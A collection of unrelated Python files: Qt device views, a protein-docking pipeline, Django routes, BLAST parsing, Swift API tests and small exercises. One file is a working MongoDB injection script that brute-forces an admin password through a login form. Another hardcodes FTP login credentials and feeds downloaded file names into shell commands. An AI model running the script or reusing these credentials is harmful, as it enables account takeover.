Qt.StatusTipRole: description or name,
Qt.TextAlignmentRole: Qt.AlignRight
}
def process(self, data):
if data is None:
return None
if self.formatter:
data = self.formatter(data)
return self.fmt % data if self.fmt else str(data)
class ColumnAction(QAction):
def __init__(self, column, toggleCallback, menu):
QAction.__init__(self, menu)
self.setCheckable(True)
self.setChecked(column.checked)
self.setToolTip(column.description or column.name)
self.setStatusTip(column.description or column.name)
toggle = lambda checked: toggleCallback(column.number, not checked)
toggle(column.checked)
self.toggled.connect(toggle)
class Cell(dict):
def __init__(self, device, column):
dict.__init__(self)
self[CHANGED_ROLE] = None
self[RAW_ROLE] = None
self[Qt.DisplayRole] = ''
self.device = device
self.column = column
def setData(self, initial = False):
data = getattr(self.device, self.column.fieldName)
if data == self[RAW_ROLE]:
self[CHANGED_ROLE] = False
else:
self[CHANGED_ROLE] = not initial
self[RAW_ROLE] = data
self[Qt.DisplayRole] = self.column.process(data)
def getData(self, role):
data = self.get(role)
return data if data != None else self.column.headers.get(role, INVALID_DATA)
class DevicesModel(QAbstractTableModel):
def __init__(self, devices, columns, parent):
QAbstractTableModel.__init__(self, parent)
self.columns = columns
self.cache = tuple(tuple(Cell(device, column) for column in columns) for device in devices)
self.numRows = len(devices)
self.numColumns = len(columns)
self.minIndex = self.createIndex(0, 0)
self.maxIndex = self.createIndex(self.numRows - 1, self.numColumns - 1)
def rowCount(self, _parent = None):
return self.numRows
def columnCount(self, _parent = None):
return self.numColumns
def getDeviceSelection(self, nRow):
return QItemSelection(self.index(nRow, 0), self.index(nRow, self.columnCount() - 1))
def headerData(self, section, orientation, role = Qt.DisplayRole):
try:
return self.columns[section].headers[role] if orientation == Qt.Horizontal else section
except LookupError: pass # ToDo: avoid exceptions
except ValueError: pass
return INVALID_DATA
def data(self, index, role = Qt.DisplayRole):
try:
return self.cache[index.row()][index.column()].getData(role)
except LookupError: pass
except AttributeError: pass
return INVALID_DATA
def refresh(self, initial = False):
for cacheRow in self.cache:
for cell in cacheRow:
cell.setData(initial)
self.dataChanged.emit(self.minIndex, self.maxIndex)
class RoleDefaultSortProxyModel(QSortFilterProxyModel):
def __init__(self, sourceModel, role = Qt.DisplayRole, parent = None):
QSortFilterProxyModel.__init__(self, parent)
self.role = role
self.setSourceModel(sourceModel)
self.setDynamicSortFilter(True)
def lessThan(self, left, right):
leftData = self.sourceModel().data(left, self.role)
rightData = self.sourceModel().data(right, self.role)
return leftData < rightData if leftData != rightData else left.row() < right.row()
class DevicesTableDelegate(QItemDelegate): # QStyledItemDelegate doesn't handle selection background color properly
def __init__(self, inactivePalette, activePalette, parent):
QItemDelegate.__init__(self, parent)
self.inactivePalette = inactivePalette
self.activePalette = activePalette
def paint(self, paint, option, index):
option.palette = self.activePalette if index.data(CHANGED_ROLE).toBool() else self.inactivePalette
QItemDelegate.paint(self, paint, option, index)
def drawFocus(self, painter, option, rect):
option.state &= ~QStyle.State_HasFocus
QItemDelegate.drawFocus(self, painter, option, rect)
class DevicesTableView(QTableView):
def configure(self, devicesModel, devicesMapFrame, changedDataSample):
self.devicesMapFrame = devicesMapFrame
self.setModel(RoleDefaultSortProxyModel(devicesModel, RAW_ROLE))
self.columnWidths = tuple(self.fontMetrics().boundingRect(column.longestValue).width() * FONT_METRICS_CORRECTION for column in devicesModel.columns)
#for column in devicesModel.columns: # ToDo: Works for width but not for height, find current row height?
# column.headers[Qt.SizeHintRole] = QSize(self.fontMetrics().boundingRect(column.longestValue).size().width(), self.rowHeight(0))
inactivePalette = self.palette()
inactivePalette.setColor(QPalette.HighlightedText, inactivePalette.color(QPalette.Text))
activePalette = QPalette(inactivePalette)
activeColor = changedDataSample.palette().color(QPalette.WindowText)
activePalette.setColor(QPalette.Text, activeColor)
activePalette.setColor(QPalette.HighlightedText, activeColor)
self.setItemDelegate(DevicesTableDelegate(inactivePalette, activePalette, self))
self.resizeRowsToContents()
self.resizeColumnsToContents()
self.horizontalHeader().setHighlightSections(False)
def sizeHintForColumn(self, nColumn):
return self.columnWidths[nColumn] # ToDo: move it column.configure
def selectionChanged(self, selected, deselected):
QTableView.selectionChanged(self, selected, deselected)
for row in (self.model().mapToSource(index).row() for index in deselected.indexes() if index.column() == 0):
self.devicesMapFrame.deactivate(row)
for row in (self.model().mapToSource(index).row() for index in selected.indexes() if index.column() == 0):
self.devicesMapFrame.activate(row)
def selectDevice(self, selection, active = True):
self.selectionModel().select(self.model().mapSelectionFromSource(selection), QItemSelectionModel.Select if active else QItemSelectionModel.Deselect)
class DeviceVisual(QLabel):
def __init__(self, device, viewSelection, activeSample, inactiveSample, mapFrame):
QLabel.__init__(self, inactiveSample.text()[0] + str(device.number), mapFrame)
self.device = device
self.viewSelection = viewSelection
self.callback = mapFrame.mouseClicked
self.activeStyleSheet = activeSample.styleSheet()
self.inactiveStyleSheet = inactiveSample.styleSheet()
self.deactivate()
def activate(self, active = True):
self.device.setWatched(active)
self.setStyleSheet(self.activeStyleSheet if active else self.inactiveStyleSheet)
def deactivate(self, inactive = True):
self.activate(not inactive)
def isActive(self):
return self.device.watched
def toggle(self):
self.activate(not self.device.watched)
def mousePressEvent(self, event):
self.callback(self, event.modifiers())
class DevicesMapFrame(QFrame):
def configure(self, devices, deviceDistance, getSelection, selectDevice, activeDeviceVisualSample, inactiveDeviceVisualSample):
self.deviceDistance = deviceDistance
self.selectDevice = selectDevice
offsetSize = self.fontMetrics().boundingRect(inactiveDeviceVisualSample.text()[0])
self.offset = tuple(float(x) / 2 for x in (offsetSize.width() * FONT_METRICS_CORRECTION, offsetSize.height()))
self.deviceVisuals = tuple(DeviceVisual(device, getSelection(device.number), activeDeviceVisualSample, inactiveDeviceVisualSample, self) for device in devices)
self.oldWindowSize = None
self.recalculate(self.width())
def afterShow(self): # must be performed after show()
for deviceVisual in self.deviceVisuals:
deviceVisual.deactivate()
def resizeEvent(self, _event = None):
(width, height) = (self.width(), self.height())
size = min(width, height)
if width == height:
if size != self.oldSize:
self.recalculate(size)
return
# if width > height: # Trying to fit the window to the contents, works bad on Windows
# (windowWidth, windowHeight) = (self.mesh.width(), self.mesh.height())
# if (windowWidth, windowHeight) != self.oldWindowSize:
# self.oldWindowSize = (windowWidth, windowHeight)
# self.mesh.resize(windowWidth - (width - size), windowHeight)
# return
self.resize(size, size)
def recalculate(self, size):
self.oldSize = size
self.ppu = float(size) / MAP_TOTAL
self.field = MAP_FIELD * self.ppu
self.refresh()
def refresh(self):
for deviceVisual in self.deviceVisuals:
deviceVisual.move(*(int(round(c * self.ppu + self.field - offset)) for (c, offset) in zip((deviceVisual.device.x, deviceVisual.device.y), self.offset)))
def mouseClicked(self, deviceVisual, modifiers):
if modifiers == Qt.NoModifier:
for otherVisual in self.deviceVisuals:
self.selectDevice(otherVisual.viewSelection, False)
self.selectDevice(deviceVisual.viewSelection)
elif modifiers == Qt.ControlModifier:
self.selectDevice(deviceVisual.viewSelection, not deviceVisual.isActive())
elif modifiers == Qt.ShiftModifier:
self.selectDevice(deviceVisual.viewSelection)
activeVisuals = tuple(v for v in self.deviceVisuals if v.isActive())
activeVisualsAndRanges = tuple((av, max(self.deviceDistance(av.device, ov.device) for ov in activeVisuals if ov is not av)) for av in activeVisuals)
for iav in (v for v in self.deviceVisuals if not v.isActive()):
self.selectDevice(iav.viewSelection, all(self.deviceDistance(iav.device, av.device) <= radius for (av, radius) in activeVisualsAndRanges))
def activate(self, number, active = True):
self.deviceVisuals[number].activate(active)
def deactivate(self, number, inactive = True):
self.activate(number, not inactive)
|
#!/usr/bin/env python
from FileTransfer import FtpFileTransfer
import os
import subprocess
import prody
class _main_():
def fetchData():
global wd
wd = str(os.getcwd())
print('All Files will go into the celpp folder')
cred = (wd + '/credentials.txt')
try: #attempts to connect to file required to connect to ftp
print('Trying to open credentials.txt')
fo = open(cred, 'r')
fo.close()
except: #writes file required to connect to ftp if not already made
print('Writing credentials.txt file')
fo = open(cred, 'w')
fo.write('host ftp.box.com\nuser nlr23@pitt.edu\npass #hail2pitt1\npath\ncontestantid 33824\nchallengepath /challengedata\nsubmissionpath /33824')
fo.close()
if(os.path.isdir(wd + '/challengedata')==False):#creates challengedata folder if it doesn't exist
os.mkdir(wd + '/challengedata')
os.chdir(wd + '/challengedata')
else: #changes to challengedata folder if it exists
os.chdir(wd + '/challengedata')
ftp = FtpFileTransfer(cred)
print('Connecting to ftp.box.com')
ftp.connect()
print('Connected to ftp')
ftp_files = ftp.list_files('challengedata')#creates list of files from box
count = 0 #keep track number of files added to local folder
for x in (ftp_files):
split = os.path.splitext(x)
dir = os.path.splitext(split[0])
if(str(split[1]) == '.gz'):
if os.path.isfile(x) == True:#if it finds the zip file in local folder, unzips and deletes zippped file
print('Unzipping folder ' + str(dir[0]))
os.system('tar -xzf ' + x)
print('Deleting zip file: ' + x)
os.system('rm ' + x)
elif os.path.isdir(str(dir[0])) == True:#if it finds the unzipped directory in local folders
pass
else: #if it can't find the week in any format; downloads, unzips, and removes zipped file
ftp.download_file('challengedata/'+ x, wd + '/challengedata/' + x)
print('Unzipping folder ' + str(dir[0]))
os.system('tar -xzf ' + x)
print('Deleting zip file: ' + x)
os.system('rm ' + x)
count = count + 1
print(str(dir[0]) + ' was just added to the challengedata folder')
else:
ftp.download_file('challengedata/'+ x, wd + '/challengedata/' + x)
print('challengedata has been updated. ' + str(count) + ' week(s) was/were just added.')
print('Disconnecting from ftp')
ftp.disconnect()
def align():
global wd
ans = wd +'/challengedata/answers'
if os.path.isdir(ans)==False: #if the answers directory isnt formed make it
os.mkdir(wd+'/challengedata/answers')
rddir = wd+'/challengedata/rdkit-scripts'
if os.path.isdir(rddir)==False:
a='git clone https://github.com/dkoes/rdkit-scripts'
os.system(a)
data = os.listdir(wd+'/challengedata')
for x in (data):#for each weeks data
if x=="readme.txt" or x=="latest.txt" or x=="answers" or x=="rdkit-scripts" or x=='PDBfiles' or x=='visual.txt':
pass
else:
toDir = wd +'/challengedata/answers/' + x
if os.path.isdir(toDir)==False: #if the path to answers dir doesnt exist
os.mkdir(toDir) #make directory
dock=os.listdir(wd+'/challengedata/'+x)
for y in (dock):
a = str(os.getcwd()+'/answers/'+x+'/'+y+'/lmcss_docked.sdf')
if y=='readme.txt' or y=='new_release_structure_sequence_canonical.tsv' or y == 'new_release_structure_nonpolymer.tsv' or y=='new_release_crystallization_pH.tsv' or y=='new_release_structure_sequence.tsv':
pass
elif(os.path.isfile(a)==True):
pass
else:
input = os.listdir(wd+'/challengedata/'+x+'/'+y)
for z in (input):
if z.startswith("LMCSS") and z.endswith(".pdb"):
if(z.endswith("lig.pdb")):
pass
else:
sts = str("grep ATOM "+ z+" > lmcss_rec.pdb")
cd = wd+'/challengedata'
os.chdir(cd+'/'+x+'/'+y)
os.system(sts)
os.chdir(cd)
input = os.listdir(cd+'/'+x+'/'+y)
for z in (input):
if z.endswith(".smi"):
cd = str(os.getcwd())
sts = str(" "+cd+'/'+x+'/'+y+'/'+z +" lig.sdf --maxconfs 1")
os.chdir(cd+'/'+x+'/'+y)
os.system(cd+'/rdkit-scripts/rdconf.py'+ sts)
os.chdir(cd)
input = os.listdir(cd+'/'+x+'/'+y)
for z in (input):
if z.endswith("lig.pdb"):
sts=str("smina -r lmcss_rec.pdb -l lig.sdf --autobox_ligand "+z+" -o lmcss_docked.sdf")
cd=str(os.getcwd())
os.chdir(cd+'/'+x+'/'+y)
os.system(sts)
os.chdir(cd)
cur = str(os.getcwd()+'/answers/'+x+'/'+y)
if (os.path.isdir(cur)==True):
os.chdir(cd+'/'+x+'/'+y)
input = os.listdir(cd+'/'+x+'/'+y)
for i in (input):
if i.endswith("lig.pdb"):
#see if pdb exists
protein = prody.fetchPDB(y)
f =open('sdsorted.txt','ab+')
bind =subprocess.check_output('sdsorter lmcss_docked.sdf -print', shell=True)
f.write(bind)
f.close()
k=open('sdsorted.txt')
lines = k.readlines()
bind=lines[1].strip('1 ')
bind =bind.split(" ",1)
print(bind[0])
k.close()
sts=str("obrms -f "+i+" lmcss_docked.sdf")
f=open('rmsd.txt', 'ab+')
rm =subprocess.check_output(sts, shell=True)
f.write(rm)
f.close()
j=open('rmsd.txt')
lines=j.readlines()
top=lines[1].strip('RMSD : ')
top=top.replace('\n','')
j.close()
print top
#run obrms
# parse results and output to the visualization txt file
#os.system(sts)
f=open('visual.txt', 'ab+')
f.write(x+' smina '+y+' '+top+' '+bind[0]+'\n')
f.close
os.chdir(wd+'/challengedata/')
print(x+' '+y)
break
os.chdir(wd)
else:
os.mkdir(cur)
os.chdir(cd+'/'+x+'/'+y)
input = os.listdir(cd+'/'+x+'/'+y)
for i in (input):
if i.endswith("lig.pdb"):
protein = prody.fetchPDB(y)
f=open('sdsorted.txt','ab+')
bind =subprocess.check_output('sdsorter lmcss_docked.sdf -print', shell=True)
f.write(bind)
f.close()
k=open('sdsorted.txt')
lines = k.readlines()
bind=lines[1].strip('1 ')
bind =bind.split(" ",1)
print(bind[0])
k.close()
sts=str("obrms -f "+i+" lmcss_docked.sdf")
f=open('rmsd.txt', 'ab+')
rm =subprocess.check_output(sts, shell=True)
f.write(rm)
f.close()
j=open('rmsd.txt')
lines=j.readlines()
top=lines[1].strip('RMSD : ')
top=top.replace('\n','')
print top
j.close()
#os.system(sts)
f=open('visual.txt', 'ab+')
f.write(x+' smina '+y+' '+top+' '+bind[0]+'\n')
f.close()
os.chdir(wd+'/challengedata/')
print(x+' '+y)
break
os.chdir(wd)
def compare():
###get PDB files from databank that are associated with each protein for later use
##change directory
#create a folder that contains all pdb files from the PDB if it does not exist
prody.pathPDBFolder(wd + '/challengedata/PDBfiles')
#list of proteins that need to be downloaded
weeks = []
for(_, dirnames, _) in os.walk(wd + '/challengedata'):
if (dirnames=='latest.txt' or dirnames=='answers' or dirnames =='rdkit-scripts'):
pass
elif (dirnames not in weeks):
weeks.extend(dirnames)
proteins = [x for x in weeks if 'celpp' not in x]
#download pdb using prody
for x in proteins:
if x=='rdkit-scripts' or x=='PDBfiles' or x=='answers':
pass
else:
protein = prody.fetchPDB(x)
#prody.superpose()
def uploadData():#uploads zip files containing docking predictions to contestant folder specified in credentials.txt
print('Uploading files to box contestant folder')
cred = wd + '/credentials.txt'
ftp = FtpFileTransfer(cred)
print('Connecting to ftp.box.com')
ftp.connect()
print('Connected to ftp')
ftp_files = ftp.list_files(ftp.get_contestant_id())#creates list of files from box
d = []
for(_, dirnames, _) in os.walk(wd + '/protocols'):
d.extend(dirnames)
break
for dir in (d):#NOT A FAN OF THE NESTED FOR LOOPS, WILL TRY TO FIND BETTER WAY TO IMPLEMENT THIS
for(_,_,filenames) in os.walk(wd + '/protocols/' + dir):
f = []
f.extend(filenames)
print('Uploading files for ' + dir)
for x in (f):
if((x in ftp_files) == False):
file = wd + '/protocols/' + dir + '/' + x
remote_dir = ftp.get_remote_submission_dir()
remote_file_name = os.path.basename(file)
ftp.upload_file_direct(file, remote_dir, remote_file_name)
else:
pass
print('All the files have been uploaded. Disconnecting from ftp')
ftp.disconnect()
fetchData()
align()
#uploadData()
|
from django.urls import path, include
from rest_framework import routers
import shop.views
router = routers.DefaultRouter()
router.register('categories', shop.views.CategoryViewSet)
router.register('items', shop.views.ItemViewSet,basename='Item')
urlpatterns = [
path('', include(router.urls)),
]
|
#!/usr/bin/env python
#-*- coding: UTF-8 -*_
import os
import pandas as pd
import sys
from Bio import SeqIO
from subprocess import Popen, PIPE
def Parser(folder):
""" Funtion to determined if the files have the format genbank
and to rewrite the file in fasta format """
directory = os.getcwd()
try:
if os.path.isfile("file_parseado") == True:
os.remove("file_parseado")
else:
pass
output_handle = open("file_parseado", "a")
os.chdir(folder)
os.listdir()
for file in os.listdir():
with open(file, "r") as input_handle:
for seq_record in SeqIO.parse(input_handle, "genbank"):
for seq_feature in seq_record.features:
try:
if seq_feature.type == 'CDS':
#Select the outputs for the file
output_handle.write("> %s@%s\n%s\n" % (
seq_feature.qualifiers['locus_tag'][0],
seq_record.name,
seq_feature.qualifiers['translation'][0]))
except:
pass
input_handle.close()
output_handle.close()
print("Done!")
os.chdir(directory)
except:
print("Incorrect format")
sys.exit()
def BlastP(file_query, file_parseado):
"""Funtion for doing blastp where is needed two differents files.
Files must be fasta. The result will be save as {id}_result.tsv
in the folder choose by the user"""
with open(file_query, "r") as query:
for record in SeqIO.parse(query, "fasta"):
seq = str(">%s\n%s" % (record.id, record.seq))
temp = open(record.id + "temp.faa", "w")
temp.write(seq)
temp.close()
# Call the function blast
with open(record.id + "_result.tsv", "w") as res_blast:
process = Popen(['blastp', '-query', record.id + "temp.faa", '-subject',
file_parseado, '-evalue', '0.00001', '-outfmt',
"6 qseqid qcovs pident evalue sseqid sseq"], stdout=PIPE, stderr=PIPE)
header = str("query_ID\tCoverage\tIdentity\tEvalue\tSubject_ID\tSubject_seq\n")
result = process.stdout.read().decode("utf-8")
res_blast.write(header)
res_blast.write(result)
res_blast.close()
os.remove(record.id + "temp.faa")
print("Blastp is done")
def Values(file_query):
"""Funtion to filter the blastp result. First we save the values of
coverage and identity in variables. In case they are not introduced
the variable will be assign with exactly values. The the file will
be filter. Outputs will be save in the folder created and in format
tsv"""
# Control the value of coverage
try:
if int(sys.argv[3]) >= 100:
print("Error: coverage has to be in between 0 and 100. Try again.")
sys.exit()
elif int(sys.argv[3]) >= 0 or int(sys.argv[3]) <= 100:
print("This coverage is OK.")
value_cover = sys.argv[3]
pass
except:
value_cover = 50
# Control de value of identity
try:
if int(sys.argv[4]) >= 100:
print("Error: identity has to be in between 0 and 100. Try again.")
sys.exit()
elif int(sys.argv[4]) >= 0 or int(sys.argv[4]) <= 100:
print("This identity is OK.")
value_identity = sys.argv[4]
pass
except:
value_identity = 30
# Filtration
for record in SeqIO.parse(file_query, "fasta"):
with open(record.id + "_result.tsv") as tsvfile, \
open(record.id + "_filter.tsv", "w") as tsv_filter:
tsvreader = pd.read_csv(tsvfile, delimiter='\t')
trying = tsvreader.loc[(tsvreader['Identity'] >= int(value_identity))
& (tsvreader['Coverage'] >= int(value_cover)), :]
trying.to_csv(tsv_filter, sep='\t')
tsvfile.close()
tsv_filter.close()
print("The filtration is done correctly") |
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome.components import text_sensor
from esphome.const import CONF_ID
from . import EmptySensorHub, CONF_HUB_ID
DEPENDENCIES = ['empty_sensor_hub']
text_sensor_ns = cg.esphome_ns.namespace('text_sensor')
TextSensor = text_sensor_ns.class_('TextSensor', text_sensor.TextSensor, cg.Nameable)
CONFIG_SCHEMA = text_sensor.TEXT_SENSOR_SCHEMA.extend({
cv.GenerateID(): cv.declare_id(TextSensor),
cv.GenerateID(CONF_HUB_ID): cv.use_id(EmptySensorHub)
}).extend(cv.COMPONENT_SCHEMA)
def to_code(config):
paren = yield cg.get_variable(config[CONF_HUB_ID])
var = cg.new_Pvariable(config[CONF_ID])
yield text_sensor.register_text_sensor(var, config)
cg.add(paren.register_text_sensor(var)) |
def get_sum(a, b):
if a > b:
a, b = b, a
return sum(xrange(a, b + 1))
|
from __future__ import absolute_import, division, unicode_literals
from json import loads, dumps
from twisted.trial.unittest import SynchronousTestCase
from twisted.internet.task import Clock
import treq
from mimic.rest.swift_api import SwiftMock
from mimic.resource import MimicRoot
from mimic.core import MimicCore
from mimic.rest.swift_api import normal_tenant_id_to_crazy_mosso_id
from mimic.test.helpers import request
class SwiftTests(SynchronousTestCase):
"""
tests for swift API
"""
def createSwiftService(self, rackspace_flavor=True):
"""
Set up to create the requests
"""
self.core = MimicCore(Clock(), [SwiftMock(rackspace_flavor)])
self.root = MimicRoot(self.core).app.resource()
self.response = request(
self, self.root, b"POST", b"/identity/v2.0/tokens",
dumps({
"auth": {
"passwordCredentials": {
"username": "test1",
"password": "test1password",
},
# TODO: should this really be 'tenantId'?
"tenantName": "fun_tenant",
}
}).encode("utf-8")
)
self.auth_response = self.successResultOf(self.response)
text_body = self.successResultOf(treq.content(self.auth_response)).decode("utf-8")
self.json_body = loads(text_body)
def test_service_catalog(self):
"""
When provided with a :obj:`SwiftMock`, :obj:`MimicCore` yields a
service catalog containing a swift endpoint.
"""
self.createSwiftService()
self.assertEqual(self.auth_response.code, 200)
self.assertTrue(self.json_body)
sample_entry = self.json_body['access']['serviceCatalog'][0]
self.assertEqual(sample_entry['type'], u'object-store')
sample_endpoint = sample_entry['endpoints'][0]
self.assertEqual(
sample_endpoint['tenantId'],
normal_tenant_id_to_crazy_mosso_id("fun_tenant")
)
self.assertEqual(sample_endpoint['region'], 'ORD')
self.assertEqual(len(self.json_body['access']['serviceCatalog']), 1)
def create_one_container(self, expected_code):
"""
Create one container and assert its code is the given expected status.
"""
uri = (self.json_body['access']['serviceCatalog'][0]['endpoints'][0]
['publicURL'] + '/testcontainer').encode("ascii")
create_container = request(self, self.root, b"PUT", uri)
create_container_response = self.successResultOf(create_container)
self.assertEqual(create_container_response.code, expected_code)
self.assertEqual(
self.successResultOf(treq.content(create_container_response)),
b"",
)
def test_create_container(self):
"""
Test to verify create container using :obj:`SwiftMock`
"""
self.createSwiftService()
self.create_one_container(201)
def test_create_twice(self):
"""
Creating a container twice results in an ACCEPTED status code.
"""
self.createSwiftService()
self.create_one_container(201)
self.create_one_container(202)
self.create_one_container(202)
def test_get_container(self):
"""
Creating a container and immediately retrieving it yields an empty list
(since there are no objects) and several headers indicating that no
objects are in the container and they consume no space.
"""
self.createSwiftService()
# create a container
uri = (self.json_body['access']['serviceCatalog'][0]['endpoints'][0]
['publicURL'] + '/testcontainer').encode("ascii")
create_container = request(self, self.root, b"PUT", uri)
self.successResultOf(create_container)
container_response = self.successResultOf(
request(self, self.root, b"GET", uri)
)
self.assertEqual(container_response.code, 200)
container_contents = self.successResultOf(
treq.json_content(container_response)
)
self.assertEqual(container_contents, [])
self.assertEqual(
container_response.headers.getRawHeaders(
b"X-Container-Object-Count")[0], b"0"
)
self.assertEqual(
container_response.headers.getRawHeaders(
b"X-Container-Bytes-Used")[0], b"0"
)
def test_get_no_container(self):
"""
GETing a container that has not been created results in a 404.
"""
self.createSwiftService()
# create a container
uri = (self.json_body['access']['serviceCatalog'][0]['endpoints'][0]
['publicURL'] + '/testcontainer').encode("ascii")
container_response = self.successResultOf(
request(self, self.root, b"GET", uri)
)
self.assertEqual(container_response.code, 404)
self.assertEqual(
container_response.headers.getRawHeaders(
"X-Container-Object-Count"), None
)
self.assertEqual(
container_response.headers.getRawHeaders(
"X-Container-Bytes-Used"), None
)
def test_put_object(self):
"""
PUTting an object into a container causes the container to list that
object.
"""
self.createSwiftService()
# create a container
uri = (self.json_body['access']['serviceCatalog'][0]['endpoints'][0]
['publicURL'] + u'/testcontainer').encode('ascii')
create_container = request(self, self.root, b"PUT", uri)
self.successResultOf(create_container)
BODY = b'some bytes'
object_uri = uri + b"/" + b"testobject"
object_response = request(self, self.root,
b"PUT", object_uri,
headers={b"content-type": [b"text/plain"]},
body=BODY)
self.assertEqual(self.successResultOf(object_response).code,
201)
container_response = self.successResultOf(
request(self, self.root, b"GET", uri)
)
self.assertEqual(container_response.code, 200)
container_contents = self.successResultOf(
treq.json_content(container_response)
)
self.assertEqual(len(container_contents), 1)
self.assertEqual(container_contents[0]['name'], "testobject")
self.assertEqual(container_contents[0]['content_type'], "text/plain")
self.assertEqual(container_contents[0]['bytes'], len(BODY))
object_response = self.successResultOf(
request(self, self.root, b"GET", object_uri)
)
self.assertEqual(object_response.code, 200)
object_body = self.successResultOf(treq.content(object_response))
self.assertEquals(object_body, BODY)
def test_openstack_ids(self):
"""
Non-Rackspace implementations of Swift just use the same tenant ID as
other services in the catalog.
(Note that this is not exposed by configuration yet, see
U{https://github.com/rackerlabs/mimic/issues/85})
"""
self.createSwiftService(False)
url = (self.json_body['access']['serviceCatalog'][0]
['endpoints'][0]['publicURL'])
self.assertIn("/fun_tenant", url)
self.assertNotIn("/MossoCloudFS_", url)
|
import tornado.ioloop
import tornado.httpserver
from config import IS_DEVELOPMENT, PORT
from utils.logging_handler import Logger
from routes import make_app
if __name__ == "__main__":
app = make_app()
if IS_DEVELOPMENT:
app.listen(PORT)
Logger.info("Development Server Running on :: http://0.0.0.0:{}".format(PORT))
else:
server = tornado.httpserver.HTTPServer(app)
server.bind(PORT)
Logger.info("Production Server Running on :: http://0.0.0.0:{}".format(PORT))
server.start(0)
tornado.ioloop.IOLoop.current().start()
|
class BinaryNode(object):
def __init__(self, value):
self.value = value # Store some arbitrary value
self.left = None
self.right = None
def add_child(self, value):
if value < self.value:
if self.left is None:
self.left = BinaryNode(value)
else:
self.left.add_child(value)
else:
if self.right is None:
self.right = BinaryNode(value)
else:
self.right.add_child(value)
def depth(self):
children = [0]
if self.left is not None:
children.append(self.left.depth())
if self.right is not None:
children.append(self.right.depth())
return 1 + max(children)
def __str__(self):
return '%s -> (%s, %s)' % (self.value, self.left, self.right)
def build_binary_tree(nlist):
if nlist:
tree = BinaryNode(nlist[0])
for i in range(1, len(nlist)):
tree.add_child(nlist[i])
return tree
else:
return None
def inorder(tree, result):
if tree.left:
inorder(tree.left, result)
result.append(tree.value)
if tree.right:
inorder(tree.right, result)
def postorder(tree, result):
if tree.left:
postorder(tree.left, result)
if tree.right:
postorder(tree.right, result)
result.append(tree.value)
def preorder(tree, result):
result.append(tree.value)
if tree.left:
preorder(tree.left, result)
if tree.right:
preorder(tree.right, result)
# Drawing the tree should be performed using preorder
if __name__ == '__main__':
import random
n = 10
data = random.sample(range(n), n)
print('Generating Binary Tree from: %s' % data)
btree = build_binary_tree(data)
print('Binary Tree: %s' % btree)
print('Depth = %d' % btree.depth())
data = []
postorder(btree, data)
print('Postorder: %s' % data)
data = []
inorder(btree, data)
print('Inorder: %s' % data)
data = []
preorder(btree, data)
print('Preorder: %s' % data)
|
while True:
s = int(input())
print('Acesso Permitido' if s == 2002 else 'Senha Invalida')
if s == 2002:
break |
import requests
import string
url = ""
username = "admin"
password = "^"
possible_chars = ...
def retrievePasswordLength(url, username):
for x in range(1, 25):
payload = {"username[$ne]":username, "password[$regex]":".{"+str(x)+"}", "login":"login"}
r = requests.post(url, data=payload, verify=False, allow_redirects=False)
#print(payload)
#print(r.status_code)
if int(r.status_code) == 200:
print("Password length is : {}".format(x-1))
break
elif int(r.status_code) == 302:
print("Not yet")
#retrievePasswordLength(url, username)
def retrievePasswordString(url, username, password):
restart = True
while restart:
restart = False
for c in possible_chars:
payload = {'username[$ne]':username, 'password[$regex]':password + c,'login':'login'}
r = requests.post(url, data=payload, verify=False, allow_redirects=False)
#print(c)
if int(r.status_code) == 302:
print("Found one more char : %s" % (password+c))
password += c
restart = True
break
retrievePasswordString(url, username, password)
|
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 25 23:46:27 2018
@author: Angela
"""
def operate(a, b, oper):
"""Apply an arithmetic operation to a and b."""
if type(oper) is not str:
raise TypeError("oper must be a string")
elif oper == '+':
return a + b
elif oper == '-':
return a - b
elif oper == '*':
return a * b
elif oper == '/':
if b == 0:
raise ZeroDivisionError("division by zero is undefined")
return a / b
raise ValueError("oper must be one of '+', '/', '-', or '*'")
def test_operate():
assert operate(1, 3,'+') == 4, "failed on positive integers"
assert operate(-5, -7,'+') == -12, "failed on negative integers"
assert operate(1, 3,'-') == -2, "failed on positive integers"
assert operate(-5, -7,'-') == 2, "failed on negative integers"
assert operate(3, 1,'-') == 2, "failed on positive integers"
assert operate(-5, 7,'-') == -12, "failed on mixed integers"
assert operate(1, 3,'*') == 3, "failed on positive integers"
assert operate(-5, -7,'*') == 35, "failed on negative integers"
assert operate(-5, 7,'*') == -35, "failed on mixed integers"
assert operate(4,2,'/') == 2, "integer division"
assert operate(5,4,'/') == 1.25, "float division"
pytest.raises(ZeroDivisionError, operate, a=4, b=0,'/') |
import dump
from itm import UCWrappedFunctionality
from utils import wait_for
import logging
log = logging.getLogger(__name__)
class Async_Channel(UCWrappedFunctionality):
def __init__(self, sid, pid, channels, pump, poly, importargs):
self.ssid = sid[0]
self.sender = sid[1]
self.receiver = sid[2]
self.round = sid[3]
self.pump = pump
UCWrappedFunctionality.__init__(self, sid, pid, channels, poly, importargs)
self.leakbuffer = None
def leak(self, msg):
self.write('f2w', ('leak', msg) )
def send_message(self, msg, imp):
log.debug('\033[91m [F_channel to={}, from={}] {}\033[0m'.format(self.receiver[1], self.sender[1], msg))
self.write('f2p', (self.receiver, msg), imp)
def party_send(self, sender, msg, imp):
print('Party send', msg)
if sender == self.sender:
log.debug('import: {}'.format(imp))
self.write( 'f2w', ('schedule', self.send_message, (msg,imp)), 0)
assert wait_for(self.w2f).msg == ('OK',)
self.leak( msg )
self.write('f2p', (self.sender, 'OK'))
else:
self.pump.write("dump")
def party_fetch(self, sender, msg):
if sender == self.receiver and self.M:
#self.f2p.write( (self.receiver, ('sent', self.M)) )
# TODO sent import too
self.write( 'f2p', (self.receiver, ('sent', self.M)) )
else:
self.pump.write("dump")
def party_msg(self, d):
msg = d.msg
imp = d.imp
sender,msg = msg
if msg[0] == 'send':
self.party_send(sender, msg, imp)
elif msg[0] == 'fetch':
self.party_fetch(sender, msg)
else:
self.pump.write("dump")
def adv_get_leaks(self):
#self.f2a.write( self.leakbuffer, 0 )
self.write( 'f2a', write( self.leakbuffer, 0 ))
self.leakbuffer = []
def adv_msg(self, d):
msg = d.msg
imp = d.imp
if msg[0] == 'get-leaks':
self.adv_get_leaks()
else:
self.pump.write("dump")
def env_msg(self, msg):
self.pump.write("dump")
def wrapper_msg(self, msg):
self.pump_write("dump")
|
"""
FENICS script for solving the Biot system using iterative fixed stress splitting method w
with mixed elements
Author: Mats K. Brun
"""
from fenics import *
from dolfin.cpp.mesh import *
from dolfin.cpp.io import *
#from dolfin.fem.bcs import *
#from dolfin.fem.interpolation import *
#from dolfin.fem.solving import *
import numpy as np
import sympy as sy
